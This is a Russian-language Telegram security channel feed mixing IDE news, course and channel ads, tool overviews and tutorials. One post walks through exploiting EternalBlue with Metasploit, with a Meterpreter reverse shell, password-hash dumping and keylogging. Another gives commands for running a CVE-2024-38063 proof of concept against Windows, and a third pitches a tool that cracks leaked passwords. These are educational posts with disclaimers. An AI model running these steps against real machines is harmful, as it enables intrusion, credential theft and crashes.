CodeGuard: CyberSec Edition

📑 Статья: «PyCharm 2026.1: что нового в главной Python IDE» JetBrains выпустила масштабное обновление PyCharm. Версия 2026.1 вышла в апреле и принесла изменения, которые действительно меняют работу. Главные новинки 2026.1:

🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредиты

Что ещё:

· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости

👉 Ссылка 😈 CodeGuard: PySec Edition | Чат

На Stepik вышла программа «Фундамент DevOps» Это комплексная программа из 4 практических курсов по ключевым технологиям современного DevOps: Linux, Git, Docker и Kubernetes. Вы последовательно пройдёте путь от работы в Linux и Git до контейнеризации приложений и управления ими в Kubernetes. Что вы изучите:

• уверенную работу в Linux и терминале • Git и контроль версий в реальных проектах • Docker и контейнеризацию приложений • Kubernetes и оркестрацию контейнеров • основы сетей, безопасности и хранения данных • автоматизацию задач и диагностику инфраструктуры ... и многому другому

Все знания закрепляются на практике с помощью заданий с автопроверкой. Материал подаётся понятным языком, шаг за шагом, с большим количеством примеров, схем и демонстраций. После прохождения вы получите сертификат, который можно добавить в резюме. Отдельно курсы стоят 16 600 ₽, но в составе программы доступны всего за 7 990 ₽: открыть на Stepik

📺 Лучшие YouTube-каналы по кибербезопасности (для новичков)

Для старта и общей базы: 🟡NetworkChuck — весёлые вводные уроки по всему подряд. 🟡David Bombal — фундаментальные вещи, Wireshark, CTF. 🟡Hak5 — железо, скрипты, обзоры инструментов. Углубляемся в пентест: 🔵IppSec — детальный разбор машин Hack The Box. Маст хэв для OSCP. 🔵HackerSploit — кибербезопасность в действии, от веба до Active Directory. 🔵The XSS Rat — баг-хантер шоу с живыми атаками. Анализ вредоносного ПО и реверс: 🔵John Hammond — ломает малварь и объясняет на пальцах. 🔵LiveOverflow — глубинный реверс-инжиниринг и взлом бинарников.

Идеально, чтобы учиться бесплатно. Просто включите и делайте 😈 CodeGuard: PySec Edition | Чат

📑 Статья: «PyCharm 2026.1: что нового в главной Python IDE» JetBrains выпустила масштабное обновление PyCharm. Версия 2026.1 вышла в апреле и принесла изменения, которые действительно меняют работу. Главные новинки 2026.1:

🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредиты

Что ещё:

· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости

👉 Ссылка 😈 CodeGuard: PySec Edition | Чат

Айтишники ловите сборник бесплатных курсов, полезных инструментов и книг Проект «TERMINAL» стал крупнейшей библиотекой бесплатного образования. В одном канале собраны курсы, книги, полезные инструменты и практические тренажёры для всех разработчиков 🎓 Практические курсы и задания 🪽 Книги и статьи известных авторов 😮‍💨 Полезные инструменты и ресурсы 🌟 IT-новости и инсайды Обучение по всем направлениям: SQL, Python, Frontend, PHP, C++, Golang, GIT, Linux, QA, Java, кибербезопасность и др. Ценишь знания, подпишись: Terminal_tg

📄 FOCA — ищем скрытые данные в документах компании Что это: Инструмент для анализа метаданных документов (DOC, PDF, XLS, PPT). Что ищет:

🟡Имена авторов и пути к папкам 🟡Скрытые сетевые пути (\server\share) 🟡Email-адреса, версии ПО 🟡Принтеры, замены шрифтов

🔧 Сайт (Windows Only) Установка: Скачать .exe с официального GitHub. Как защититься: Очищать метаданные перед публикацией документов. Встроенными средствами Office или утилитами. 😈 CodeGuard: PySec Edition | Чат

Эй, ты! 🫵 А ну быстро выключи свой VPN! • Этот пароль — слишком простой! Взломают! • Эту ссылку — открывать нельзя! Фишинг! • Сюда — данные не вводи! Мошенники! Цифровой мир стремительно меняется, а угрозы конфиденциальности становятся тотальными. Вот только 95% пользователей — беспечны и годами игнорируют базовые правила безопасности, пока не потеряют свои аккаунты. Лишь малая часть общества вовремя защищает свои данные и читает незаменимый сегодня «Пакет безопасности». Это №1 ресурс в Telegram про цифровую гигиену, кибербезопасность и стабильный доступ в интернет. Уверяем, с каждым днём канал будет только актуальнее — такова реальность цифровой эпохи, в которой мы живём. Так что лучше подпишись сейчас: @package_security

🐙 h4cker — 10 000+ ресурсов по этичному хакингу Тысячи скриптов, чек-листов и обучающих материалов от Омара Сантоса — эксперта с 20+ годами в ИБ 🔗 GitHub ⭐️ 22k+ звёзд Что внутри:

👉AI Security — защита LLM, тестирование на инъекции, AI Red Teaming 👉Certifications — дорожные карты для OSCP, CISSP, облачных сертификаций 👉Build Your Own Lab — создание домашних полигонов 👉Cybersecurity Domains — фундаментальные знания по всем направлениям 👉Training Reference — шпаргалки, книги, тулзы

Как использовать: Склонируйте репозиторий и выбирайте разделы под свои задачи. Сохраняйте — заменит десятки закладок. 😈 CodeGuard: PySec Edition | Чат

🐞 Шпаргалка по GDB — отладка бинарников из консоли 1. Запуск программы в GDB:

gdb ./program

2. Точки останова:

break main          # поставить брейк на main
break *0x401234     # поставить брейк по адресу
info breakpoints    # посмотреть все брейки
delete 1            # удалить брейк #1

3. Запуск и выполнение:

run                 # запустить
run arg1 arg2       # с аргументами
continue            # продолжить после брейка
stepi               # одна инструкция (шаг внутрь)
nexti               # одна инструкция (шаг с обходом вызовов)

4. Просмотр регистров и памяти:

info registers      # все регистры
p $eax              # значение регистра eax
x/10x $rsp          # 10 слов памяти по адресу rsp
x/s $rdi            # строка по адресу rdi

5. Анализ после сбоя (core dump):

gdb ./program core
bt                  # backtrace (стек вызовов)
frame 2             # перейти во второй фрейм
info locals         # локальные переменные

6. Полезное:

set disassembly-flavor intel   # синтаксис Intel вместо AT&T
disass main                    # дизассемблировать функцию

Сохраняйте🔖 😈 CodeGuard: PySec Edition | Чат

🏆 CTF Arsenal — 50+ тулзов в браузере для CTF и пентеста Хватит открывать 20 вкладок. CTF Arsenal собирает всё в одном дашборде. Что внутри:

🔵15+ тулзов по крипте: base64, хеши, шифры, генераторы паролей 🔵10+ для веба: SQLi пейлоады, XSS, JWT декодер, HTTP анализ 🔵12+ форензика: метаданные, стеганография (LSB), анализ PCAP 🔵8+ реверс-инжиниринг / PWN: ROP гаджеты, шеллкод, BOF паттерны

🔗 GitHub ⭐️ новинка 2025 Как запустить (без установки): ctf-arsenal.replit.app 😈 CodeGuard: PySec Edition | Чат

📡 5 площадок для CTF-соревнований (бесплатно) 1. picoCTF — от университета Карнеги-Меллон. Лучший старт для новичков. Ссылка 2. CTFtime — агрегатор всех CTF в мире. Календарь, команды, рейтинги. Ссылка 3. RingZer0 — онлайн-площадка с тысячами задач (SQLi, крипто, форензика). Ссылка 4. TryHackMe CTF — комнаты с таймером, как на настоящих соревнованиях. Ссылка 5. HackTheBox CTF — регулярные соревнования на реальных машинах. Ссылка 🎁 Бонус: Начните с picoCTF — там есть гайды для полных новичков. 😈 CodeGuard: PySec Edition | Чат

🎯 Metasploit за 5 минут — первый эксплойт Текст: 1. Запуск:

sudo msfconsole

2. Поиск модуля для EternalBlue (MS17-010):

search ms17-010

3. Используем модуль:

use exploit/windows/smb/ms17_010_eternalblue

4. Настройка (IP цели и своя слушающая машина):

set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp

5. Атака:

run

6. Получили Meterpreter shell:

sysinfo
getuid
shell

Полезные команды внутри Meterpreter: hashdump — вытащить хеши паролей screenshot — скриншот экрана жертвы keyscan_start / keyscan_dump — кейлоггер upload /file /путь — загрузить файл ⚠️ Только на своих системах или с разрешения. 😈 CodeGuard: PySec Edition | Чат

🥷 Ищем ИБ и OSINT специалистов. Релокейт, удалёнка, платим много! - Вакансии которых нет на джоб-агрегаторах - Только прямые контакты HR в Telegram 👉 @jobs_ib 🤖 ML & DS 👩‍💻 DevOps 👨‍✈️ ИБ & OSINT 👣 Go 👩‍💻 Mobile 👩‍💻 C# 👩‍💻 Node.js 👩‍💻 Python 🔎 QA 👩‍💻 Java 👩‍💻 UX/UI 👩‍💻 Frontend 🖼️ PHP 📋 Analyst 💼 1C 🖥 SQL 👩‍💻 IT HR Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.

⚔️ MITRE ATT&CK Navigator — визуализируй покрытие техник атак Планируете тест на проникновение или проверяете, насколько SOC готов к реальным атакам? 🔗 Сайт Что это: Интерактивная тепловая карта всех тактик и техник MITRE ATT&CK Как использовать:

👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSON

Для кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат

🤩 Мы для вас нашли лютый блог Ибэшника, который ведёт человек с 15-ти летним стажем работы. В канале он рассказывает: 🟢Какими инструментами он пользуется при работе 🟢Какими законными и подзаконными актами он руководствуется 🟢Как правильно делать обращения в ФСТЭК 🟢Так же рассказывает о инцидентах, с которыми встречается при работе 🫵 Карманный хакер — твой путеводитель в мир ИБ!

💀 CVE-2024-38063 — Zero-click RCE через IPv6 в Windows Август 2024. Уязвимость в Windows IPv6 stack позволяет удалённо выполнить код без клика и даже без логина . CVSS: 9.8 (критическая) Суть: Целочисленный андерфлоу в tcpip.sys. Один неправильный IPv6-пакет с фрагментами — и ядро падает (BSOD) или открывает доступ . Где искать: Windows 10/11 c выключенными обновлениями за август 2024. Особенно серверы, где IPv6 не отключали. Как проверить: Запустить PoC на Linux против целевой Windows (только на своих тестовых!) :

git clone https://github.comAvidan1/CVE-2024-38063
python3 CVE-2024-38063.py

Что искать в логах: BSOD stop code 0x00000001 в tcpip.sys Фикс: Поставить патч от Microsoft (август 2024) или отключить IPv6 . Почему страшно: Это zero-click — вам даже не надо открывать письмо или переходить по ссылке. Достаточно получить IPv6-пакет по сети 😈 CodeGuard: PySec Edition | Чат

Кто платит за последствия кибератаки? Российский бизнес всё чаще сталкивается не только с угрозой взлома, но и с финансовыми потерями после инцидентов. При этом рынок киберстрахования до сих пор остаётся серой зоной для многих компаний. Кибердом запускает исследование практик управления киберрисками, чтобы понять, как бизнес сегодня: ✔️ распределяет ответственность; ✔️ компенсирует убытки; ✔️ инвестирует в защиту; ✔️ использует киберстрахование на практике. К участию приглашаются CISO, IT-директора, руководители и специалисты в сфере кибербезопасности. 🔥 Пройти опрос Опрос анонимный. Результаты исследования будут представлены на закрытом мероприятии в Кибердоме, а участники получат приглашение и доступ к аналитике рынка. #реклама О рекламодателе

🚀 GoSearch — шерлок на стероидах (ищет ещё и утечки паролей) Sherlock хорош, но умирает. GoSearch написан на Go, летает быстрее и ищет глубже . Что умеет:

🔵Ищет по 300+ сайтам (соцсети, GitHub, форумы) 🔵Проверяет 900k утекших паролей через HudsonRock API 🔵Ищет по ProxyNova (3.2 млрд записей) и BreachDirectory (18 млрд) 🔵Пытается взломать пароли через Weakpass

Установка:

git clone https://github.com/ibnaleem/gosearch cd gosearch go build

Запуск:

./gosearch -u username --no-false-positives

Фишка против Sherlock: Цветовая индикация — жёлтые результаты под вопросом, зелёные — 100% попадание 😈 CodeGuard: PySec Edition | Чат

🔐 Когда NGFW становится единой точкой отказа, под угрозой уже не только firewall, а вся инфраструктура. Если межсетевой экран перестаёт отвечать, пользователи теряют доступ к сервисам, сегменты сети изолируются, а простой превращается в проблему для бизнеса. ✅ 10 июня на бесплатном практическом вебинаре УЦ «Фаст Лейн» разберём отказоустойчивость UserGate NGFW и что происходит при переключении узлов кластера. Программа: 🔹 FHRP-протоколы и VRRP 🔹 Active-passive и active-active 🔹 Условия переключения: отказ интерфейса, потеря шлюза, смена роли 🔹 GARP и ARP-таблицы клиентов 🔹 Анализ VRRP и ARP-трафика в Wireshark Кому полезно: сетевым инженерам, ИБ-специалистам, системным администраторам, пользователям UserGate NGFW. Ведущий - практикующий эксперт, сертифицированный инструктор UserGate, Eltex и «Код Безопасности». 📅 10 июня | 12:00 или 19:00 (МСК) 🔗 Зарегистрироваться. #реклама О рекламодателе

🐙 Awesome Infosec — коллекция бесплатных курсов по кибербезопасности Хотите учиться, но не знаете, с чего начать? Готовый список лучших бесплатных материалов. 🔗 GitHub ⭐️1k+ Что внутри: Кураторская подборка ресурсов — от академических курсов до лабораторий и CTF. Разделы:

🔵Massive Online Open Courses — Computer Security от Stanford, криптография, хардверная безопасность  🔵Academic Courses — NYU Tandon Hack Night, Offensive Computer Security от FSU, Exploitation от RPI  🔵Laboratories — практические стенды 🔵CTF — площадки для тренировок 🔵SecurityTube Playlists — видео-лекции

Кому зайдёт: Новичкам и профессионалам, которые хотят систематизировать знания. 😈 CodeGuard: PySec Edition | Чат